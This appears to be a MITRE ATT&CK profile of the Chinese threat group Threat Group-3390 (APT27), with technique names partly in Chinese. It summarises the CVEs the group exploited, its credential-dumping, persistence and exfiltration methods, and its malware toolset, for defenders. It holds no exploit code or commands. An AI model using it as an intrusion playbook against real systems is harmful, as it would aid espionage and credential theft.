1. Home
  2. Groups
  3. Threat Group-3390

Threat Group-3390

Threat Group-3390 is a Chinese threat group that has extensively used strategic Web compromises to target victims.[1] The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.[2][3][4]

ID: G0027
Associated Groups: Earth Smilodon, TG-3390, Emissary Panda, BRONZE UNION, APT27, Iron Tiger, LuckyMouse
Contributors: Daniyal Naeem, BT Security; Kyaw Pyiyt Htet, @KyawPyiytHtet
Version: 2.2
Created: 31 May 2017
Last Modified: 10 April 2024

Associated Group Descriptions

Name Description
Earth Smilodon

[5]
TG-3390

[1][6][7]
Emissary Panda

[8][6][3][7][9][5]
BRONZE UNION

[2][6]
APT27

[6][3][7][5]
Iron Tiger

[7][5]
LuckyMouse

[3][7][5]
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows管理规范

A Threat Group-3390 tool can use WMI to execute a binary.[6]
Enterprise T1555 .005 从密码存储中获取凭证: Password Managers

Threat Group-3390 obtained a KeePass database from a compromised host.[4]
Enterprise T1005 从本地系统获取数据

Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories.[2]
Enterprise T1195 .002 供应链破坏: Compromise Software Supply Chain

Threat Group-3390 has compromised the Able Desktop installer to gain access to victim's environments.[5]
Enterprise T1199 信任关系

Threat Group-3390 has compromised third party service providers to gain access to victim's environments.[10]
Enterprise T1112 修改注册表

A Threat Group-3390 tool has created new Registry keys under HKEY_CURRENT_USER\Software\Classes\ and HKLM\SYSTEM\CurrentControlSet\services.[6][5]
Enterprise T1543 .003 创建或修改系统进程: Windows Service

Threat Group-3390's malware can create a new service, sometimes naming it after the config information, to gain persistence.[6][11]
Enterprise T1190 利用公开应用程序漏洞

Threat Group-3390 has exploited the Microsoft SharePoint vulnerability CVE-2019-0604 and CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Exchange Server.[5]
Enterprise T1574 .001 劫持执行流: DLL Search Order Hijacking

Threat Group-3390 has performed DLL search order hijacking to execute their payload.[6]
.002 劫持执行流: DLL Side-Loading

Threat Group-3390 has used DLL side-loading, including by using legitimate Kaspersky antivirus variants as well as rc.exe, a legitimate Microsoft Resource Compiler.[1][2][3][9][11]
Enterprise T1140 反混淆/解码文件或信息

During execution, Threat Group-3390 malware deobfuscates and decompresses code that was encoded with Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression.[3]
Enterprise T1547 .001 启动或登录自动启动执行: Registry Run Keys / Startup Folder

Threat Group-3390's malware can add a Registry key to Software\Microsoft\Windows\CurrentVersion\Run for persistence.[6][11]
Enterprise T1059 .001 命令与脚本解释器: PowerShell

Threat Group-3390 has used PowerShell for execution.[2][4]
.003 命令与脚本解释器: Windows Command Shell

Threat Group-3390 has used command-line interfaces for execution.[2][9]
Enterprise T1133 外部远程服务

Threat Group-3390 actors look for and use VPN profiles during an operation to access the network using external VPN services.[1] Threat Group-3390 has also obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network.[2]
Enterprise T1562 .002 妨碍防御: Disable Windows Event Logging

Threat Group-3390 has used appcmd.exe to disable logging on a victim server.[2]
Enterprise T1203 客户端执行漏洞利用

Threat Group-3390 has exploited CVE-2018-0798 in Equation Editor.[5]
Enterprise T1071 .001 应用层协议: Web Protocols

Threat Group-3390 malware has used HTTP for C2.[3]
Enterprise T1560 .002 归档收集数据: Archive via Library

Threat Group-3390 has used RAR to compress, encrypt, and password-protect files prior to exfiltration.[2]
Enterprise T1003 .001 操作系统凭证转储: LSASS Memory

Threat Group-3390 actors have used a modified version of Mimikatz called Wrapikatz to dump credentials. They have also dumped credentials from domain controllers.[1][2]
.002 操作系统凭证转储: Security Account Manager

Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers.[1][2]
.004 操作系统凭证转储: LSA Secrets

Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers.[1][2]
Enterprise T1030 数据传输大小限制

Threat Group-3390 actors have split RAR files for exfiltration into parts.[1]
Enterprise T1074 .001 数据分段: Local Data Staging

Threat Group-3390 has locally staged encrypted archives for later exfiltration efforts.[2]
.002 数据分段: Remote Data Staging

Threat Group-3390 has moved staged encrypted archives to Internet-facing servers that had previously been compromised with China Chopper prior to exfiltration.[2]
Enterprise T1608 .001 暂存能力: Upload Malware

Threat Group-3390 has hosted malicious payloads on Dropbox.[4]
.002 暂存能力: Upload Tool

Threat Group-3390 has staged tools, including gsecdump and WCE, on previously compromised websites.[1]
.004 暂存能力: Drive-by Target

Threat Group-3390 has embedded malicious code into websites to screen a potential victim's IP address and then exploit their browser if they are of interest.[8]
Enterprise T1078 有效账户

Threat Group-3390 actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks.[1]
Enterprise T1505 .003 服务器软件组件: Web Shell

Threat Group-3390 has used a variety of Web shells.[9]
Enterprise T1068 权限提升漏洞利用

Threat Group-3390 has used CVE-2014-6324 and CVE-2017-0213 to escalate privileges.[2][10]
Enterprise T1012 查询注册表

A Threat Group-3390 tool can read and decrypt stored Registry values.[6]
Enterprise T1189 浏览器攻击

Threat Group-3390 has extensively used strategic web compromises to target victims.[1][3]
Enterprise T1027 .002 混淆文件或信息: Software Packing

Threat Group-3390 has packed malware and tools, including using VMProtect.[4][5]
.013 混淆文件或信息: Encrypted/Encoded File

A Threat Group-3390 tool can encrypt payloads using XOR. Threat Group-3390 malware is also obfuscated using Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression.[6][3][9]
Enterprise T1548 .002 滥用权限提升控制机制: Bypass User Account Control

A Threat Group-3390 tool can use a public UAC bypass method to elevate privileges.[6]
Enterprise T1204 .002 用户执行: Malicious File

Threat Group-3390 has lured victims into opening malicious files containing malware.[4]
Enterprise T1070 .004 移除指标: File Deletion

Threat Group-3390 has deleted existing logs and exfiltrated file archives from a victim.[2][4]
.005 移除指标: Network Share Connection Removal

Threat Group-3390 has detached network shares after exfiltrating files, likely to evade detection.[2]
Enterprise T1033 系统所有者/用户发现

Threat Group-3390 has used whoami to collect system user information.[4]
Enterprise T1049 系统网络连接发现

Threat Group-3390 has used net use and netstat to conduct internal discovery of systems. The group has also used quser.exe to identify existing RDP sessions on a victim.[2]
Enterprise T1016 系统网络配置发现

Threat Group-3390 actors use NBTscan to discover vulnerable systems.[1]
Enterprise T1046 网络服务发现

Threat Group-3390 actors use the Hunter tool to conduct network service discovery for vulnerable systems.[1][9]
Enterprise T1119 自动化收集

Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories.[2]
Enterprise T1583 .001 获取基础设施: Domains

Threat Group-3390 has registered domains for C2.[11]
Enterprise T1588 .002 获取能力: Tool

Threat Group-3390 has obtained and used tools such as Impacket, pwdump, Mimikatz, gsecdump, NBTscan, and Windows Credential Editor.[9][1]
.003 获取能力: Code Signing Certificates

Threat Group-3390 has obtained stolen valid certificates, including from VMProtect and the Chinese instant messaging application Youdu, for their operations.[11]
Enterprise T1087 .001 账号发现: Local Account

Threat Group-3390 has used net user to conduct internal discovery of systems.[2]
Enterprise T1105 输入工具传输

Threat Group-3390 has downloaded additional malware and tools, including through the use of certutil, onto a compromised host .[1][4]
Enterprise T1056 .001 输入捕获: Keylogging

Threat Group-3390 actors installed a credential logger on Microsoft Exchange servers. Threat Group-3390 also leveraged the reconnaissance framework, ScanBox, to capture keystrokes.[1][7][3]
Enterprise T1055 .012 进程注入: Process Hollowing

A Threat Group-3390 tool can spawn svchost.exe and inject the payload into that process.[6][3]
Enterprise T1021 .006 远程服务: Windows Remote Management

Threat Group-3390 has used WinRM to enable remote execution.[2]
Enterprise T1210 远程服务漏洞利用

Threat Group-3390 has exploited MS17-010 to move laterally to other systems on the network.[9]

Enterprise T1018 远程系统发现

Threat Group-3390 has used the net view command.[6]
Enterprise T1567 .002 通过网络服务渗出: Exfiltration to Cloud Storage

Threat Group-3390 has exfiltrated stolen data to Dropbox.[4]
Enterprise T1566 .001 钓鱼: Spearphishing Attachment

Threat Group-3390 has used e-mail to deliver malicious attachments to victims.[4]
Enterprise T1053 .002 预定任务/作业: At

Threat Group-3390 actors use at to schedule tasks to run self-extracting RAR archives, which install HTTPBrowser or PlugX on other victims on a network.[1]

Software

ID Name References Techniques
S0073 ASPXSpy Threat Group-3390 has used a modified version of ASPXSpy called ASPXTool.[1][10] 服务器软件组件: Web Shell
S0160 certutil [4] 反混淆/解码文件或信息, 归档收集数据: Archive via Utility, 输入工具传输, 颠覆信任控制: Install Root Certificate
S0020 China Chopper [1][2][6][9] 从本地系统获取数据, 命令与脚本解释器: Windows Command Shell, 应用层协议: Web Protocols, 文件和目录发现, 暴力破解: Password Guessing, 服务器软件组件: Web Shell, 混淆文件或信息: Software Packing, 移除指标: Timestomp, 网络服务发现, 输入工具传输
S0660 Clambling [4][10][5] 从本地系统获取数据, 修改注册表, 创建或修改系统进程: Windows Service, 剪贴板数据, 劫持执行流: DLL Side-Loading, 反混淆/解码文件或信息, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器: Windows Command Shell, 命令与脚本解释器: PowerShell, 屏幕捕获, 应用层协议, 应用层协议: Web Protocols, 文件和目录发现, 查询注册表, 混淆文件或信息, 滥用权限提升控制机制: Bypass User Account Control, 用户执行: Malicious File, 系统信息发现, 系统所有者/用户发现, 系统时间发现, 系统服务: Service Execution, 系统网络配置发现, 网络共享发现, 网络服务: Bidirectional Communication, 虚拟化/沙盒规避: Time Based Evasion, 视频捕获, 输入捕获: Keylogging, 进程发现, 进程注入, 进程注入: Process Hollowing, 通过网络服务渗出: Exfiltration to Cloud Storage, 钓鱼: Spearphishing Attachment, 隐藏伪装: Hidden Files and Directories, 非应用层协议
S0154 Cobalt Strike [4] BITS任务, Windows管理规范, 从本地系统获取数据, 代理: Domain Fronting, 代理: Internal Proxy, 使用备用认证材料: Pass the Hash, 修改注册表, 创建或修改系统进程: Windows Service, 办公应用启动: Office Template Macros, 加密通道: Asymmetric Cryptography, 加密通道: Symmetric Cryptography, 协议隧道, 反射性代码加载, 反混淆/解码文件或信息, 命令与脚本解释器: JavaScript, 命令与脚本解释器: Visual Basic, 命令与脚本解释器: PowerShell, 命令与脚本解释器: Python, 命令与脚本解释器: Windows Command Shell, 妨碍防御: Disable or Modify Tools, 客户端执行漏洞利用, 屏幕捕获, 应用层协议: DNS, 应用层协议: Web Protocols, 应用层协议: File Transfer Protocols, 操作系统凭证转储: LSASS Memory, 操作系统凭证转储: Security Account Manager, 数据传输大小限制, 数据混淆: Protocol or Service Impersonation, 数据编码: Standard Encoding, 文件和目录发现, 有效账户: Domain Accounts, 有效账户: Local Accounts, 本机API, 权限提升漏洞利用, 权限组发现: Domain Groups, 权限组发现: Local Groups, 查询注册表, 浏览器会话劫持, 混淆文件或信息: Indicator Removal from Tools, 混淆文件或信息, 滥用权限提升控制机制: Sudo and Sudo Caching, 滥用权限提升控制机制: Bypass User Account Control, 移除指标: Timestomp, 系统二进制代理执行: Rundll32, 系统服务: Service Execution, 系统服务发现, 系统网络连接发现, 系统网络配置发现, 网络共享发现, 网络服务发现, 访问令牌操控: Parent PID Spoofing, 访问令牌操控: Token Impersonation/Theft, 访问令牌操控: Make and Impersonate Token, 账号发现: Domain Account, 软件发现, 输入工具传输, 输入捕获: Keylogging, 进程发现, 进程注入: Dynamic-link Library Injection, 进程注入: Process Hollowing, 进程注入, 远程服务: Remote Desktop Protocol, 远程服务: SSH, 远程服务: Windows Remote Management, 远程服务: SMB/Windows Admin Shares, 远程服务: Distributed Component Object Model, 远程系统发现, 隐藏伪装: Process Argument Spoofing, 非应用层协议, 预定传输, 颠覆信任控制: Code Signing
S0032 gh0st RAT [12] 修改注册表, 共享模块, 创建或修改系统进程: Windows Service, 加密通道: Symmetric Cryptography, 加密通道, 动态解析: Fast Flux DNS, 劫持执行流: DLL Side-Loading, 反混淆/解码文件或信息, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器, 屏幕捕获, 数据编码: Standard Encoding, 本机API, 查询注册表, 移除指标: Clear Windows Event Logs, 移除指标: File Deletion, 系统二进制代理执行: Rundll32, 系统信息发现, 系统服务: Service Execution, 输入工具传输, 输入捕获: Keylogging, 进程发现, 进程注入, 非应用层协议
S0008 gsecdump [1] 操作系统凭证转储: Security Account Manager, 操作系统凭证转储: LSA Secrets
S0070 HTTPBrowser [1][2][6][5] 伪装: Match Legitimate Name or Location, 劫持执行流: DLL Search Order Hijacking, 劫持执行流: DLL Side-Loading, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器: Windows Command Shell, 应用层协议: DNS, 应用层协议: Web Protocols, 文件和目录发现, 混淆文件或信息, 移除指标: File Deletion, 输入工具传输, 输入捕获: Keylogging
S0398 HyperBro [9][3][7][4][5] 劫持执行流: DLL Side-Loading, 反混淆/解码文件或信息, 屏幕捕获, 应用层协议: Web Protocols, 本机API, 混淆文件或信息: Software Packing, 混淆文件或信息: Encrypted/Encoded File, 移除指标: File Deletion, 系统服务: Service Execution, 系统服务发现, 输入工具传输, 进程注入
S0357 Impacket [9] Windows管理规范, 中间人攻击: LLMNR/NBT-NS Poisoning and SMB Relay, 操作系统凭证转储: NTDS, 操作系统凭证转储: LSASS Memory, 操作系统凭证转储: Security Account Manager, 操作系统凭证转储: LSA Secrets, 窃取或伪造Kerberos票据: Kerberoasting, 窃取或伪造Kerberos票据: Ccache Files, 系统服务: Service Execution, 网络嗅探
S0100 ipconfig [2] 系统网络配置发现
S0002 Mimikatz Threat Group-3390 has used a modified version of Mimikatz called Wrapikatz.[2][6][4][13][10] 从密码存储中获取凭证, 从密码存储中获取凭证: Credentials from Web Browsers, 从密码存储中获取凭证: Windows Credential Manager, 伪造域控制器, 使用备用认证材料: Pass the Hash, 使用备用认证材料: Pass the Ticket, 启动或登录自动启动执行: Security Support Provider, 操作系统凭证转储: DCSync, 操作系统凭证转储: Security Account Manager, 操作系统凭证转储: LSASS Memory, 操作系统凭证转储: LSA Secrets, 未加密凭证: Private Keys, 窃取或伪造Kerberos票据: Golden Ticket, 窃取或伪造Kerberos票据: Silver Ticket, 窃取或伪造身份认证证书, 访问令牌操控: SID-History Injection, 账号操控
S0590 NBTscan [1][4] 系统所有者/用户发现, 系统网络配置发现, 网络嗅探, 网络服务发现, 远程系统发现
S0039 Net [2] 创建账户: Local Account, 创建账户: Domain Account, 密码策略发现, 权限组发现: Domain Groups, 权限组发现: Local Groups, 移除指标: Network Share Connection Removal, 系统时间发现, 系统服务: Service Execution, 系统服务发现, 系统网络连接发现, 网络共享发现, 账号发现: Domain Account, 账号发现: Local Account, 账号操控: Additional Local or Domain Groups, 远程服务: SMB/Windows Admin Shares, 远程系统发现
S0104 netstat [4] 系统网络连接发现
S0664 Pandora [5] 修改注册表, 创建或修改系统进程: Windows Service, 加密通道: Symmetric Cryptography, 劫持执行流: DLL Side-Loading, 应用层协议: Web Protocols, 权限提升漏洞利用, 流量激活, 混淆文件或信息, 系统服务: Service Execution, 输入工具传输, 进程发现, 进程注入, 颠覆信任控制: Code Signing Policy Modification
S0013 PlugX [1][2][6][4][10] 伪装: Masquerade Task or Service, 伪装: Match Legitimate Name or Location, 修改注册表, 创建或修改系统进程: Windows Service, 加密通道: Symmetric Cryptography, 劫持执行流: DLL Side-Loading, 劫持执行流: DLL Search Order Hijacking, 反混淆/解码文件或信息, 可信开发者工具代理执行: MSBuild, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器: Windows Command Shell, 屏幕捕获, 应用层协议: Web Protocols, 应用层协议: DNS, 文件和目录发现, 本机API, 查询注册表, 混淆文件或信息, 系统网络连接发现, 网络共享发现, 网络服务: Dead Drop Resolver, 虚拟化/沙盒规避: System Checks, 输入工具传输, 输入捕获: Keylogging, 进程发现, 隐藏伪装: Hidden Files and Directories, 非应用层协议
S0006 pwdump [9] 操作系统凭证转储: Security Account Manager
S0662 RCSession [5][4][10] 从本地系统获取数据, 伪装, 修改注册表, 加密通道, 劫持执行流: DLL Side-Loading, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器: Windows Command Shell, 屏幕捕获, 应用层协议: Web Protocols, 本机API, 混淆文件或信息: Encrypted/Encoded File, 混淆文件或信息: Fileless Storage, 滥用权限提升控制机制: Bypass User Account Control, 移除指标: File Deletion, 系统二进制代理执行: Msiexec, 系统信息发现, 系统所有者/用户发现, 输入工具传输, 输入捕获: Keylogging, 进程发现, 进程注入: Process Hollowing, 非应用层协议
S0096 Systeminfo [4] 系统信息发现
S0663 SysUpdate [5] Windows管理规范, 从本地系统获取数据, 伪装: Masquerade Task or Service, 修改注册表, 创建或修改系统进程: Systemd Service, 创建或修改系统进程: Windows Service, 加密通道: Symmetric Cryptography, 劫持执行流: DLL Side-Loading, 反混淆/解码文件或信息, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 屏幕捕获, 应用层协议: DNS, 数据编码: Standard Encoding, 文件和目录发现, 本机API, 混淆文件或信息: Fileless Storage, 混淆文件或信息: Encrypted/Encoded File, 混淆文件或信息: Software Packing, 移除指标: File Deletion, 系统信息发现, 系统所有者/用户发现, 系统服务: Service Execution, 系统服务发现, 系统网络配置发现: Internet Connection Discovery, 系统网络配置发现, 输入工具传输, 进程发现, 通过C2信道渗出, 隐藏伪装: Hidden Files and Directories, 颠覆信任控制: Code Signing
S0057 Tasklist [4] 系统服务发现, 软件发现: Security Software Discovery, 进程发现
S0005 Windows Credential Editor [1] 操作系统凭证转储: LSASS Memory
S0412 ZxShell [12] 从本地系统获取数据, 代理, 修改注册表, 创建或修改系统进程: Windows Service, 创建账户: Local Account, 利用公开应用程序漏洞, 命令与脚本解释器: Windows Command Shell, 妨碍防御: Disable or Modify System Firewall, 妨碍防御: Disable or Modify Tools, 屏幕捕获, 应用层协议: Web Protocols, 应用层协议: File Transfer Protocols, 文件和目录发现, 本机API, 查询注册表, 移除指标: Clear Windows Event Logs, 移除指标: File Deletion, 系统二进制代理执行: Rundll32, 系统信息发现, 系统所有者/用户发现, 系统服务: Service Execution, 系统服务发现, 终端拒绝服务, 网络服务发现, 视频捕获, 访问令牌操控: Create Process with Token, 输入工具传输, 输入捕获: Credential API Hooking, 输入捕获: Keylogging, 进程发现, 进程注入: Dynamic-link Library Injection, 远程服务: VNC, 远程服务: Remote Desktop Protocol, 非标准端口

References

  1. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.
  2. Counter Threat Unit Research Team. (2017, June 27). BRONZE UNION Cyberespionage Persists Despite Disclosures. Retrieved July 13, 2017.
  3. Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.
  4. Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.
  5. Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.
  6. Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018.
  7. Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018.
  1. Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016.
  2. Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.
  3. Global Threat Center, Intelligence Team. (2020, December). APT27 Turns to Ransomware. Retrieved November 12, 2021.
  4. Daniel Lunghi. (2023, March 1). Iron Tiger’s SysUpdate Reappears, Adds Linux Targeting. Retrieved March 20, 2023.
  5. Counter Threat Unit Research Team. (2019, February 27). A Peek into BRONZE UNION’s Toolbox. Retrieved September 24, 2019.
  6. Chen, T. and Chen, Z. (2020, February 17). CLAMBLING - A New Backdoor Base On Dropbox. Retrieved November 12, 2021.